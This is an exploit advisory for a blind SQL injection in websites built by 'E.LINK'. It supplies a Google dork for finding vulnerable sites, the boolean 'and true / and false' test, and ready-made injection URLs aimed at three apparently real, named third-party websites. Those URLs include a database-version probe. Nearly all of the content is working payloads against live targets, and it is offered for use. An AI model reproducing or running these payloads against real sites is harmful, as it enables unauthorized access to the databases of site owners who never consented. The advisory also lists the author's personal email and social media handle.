*********************************************************
#Exploit Title: Designe by E.LINK - Blind Sql Injection Vulnerability
#Date: 2020-11-12
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designe by E.LINK"
#Category:webapps
#Tested On: windows 10, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* http://www.shinlichia.com/news.php?id=29%20and%20true
* http://www.shinlichia.com/news.php?id=29%20and%20false
* http://www.shinlichia.com/news.php?id=29%20and%20substring(@@version,1,1)=5--
### Demo 2:
* http://www.yeoongyeu.com.tw/news.php?id=1%20and%20true
* http://www.yeoongyeu.com.tw/news.php?id=1%20and%20false
* http://www.yeoongyeu.com.tw/news.php?id=1%20and%20substring(@@version,1,1)=5--
###Demo 3:
* http://www.refirmance.com.tw/why.php?id=13%20and%20true
* http://www.refirmance.com.tw/why.php?id=13%20and%20false
* http://www.refirmance.com.tw/why.php?id=13%20and%20substring(@@version,1,1)=5--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************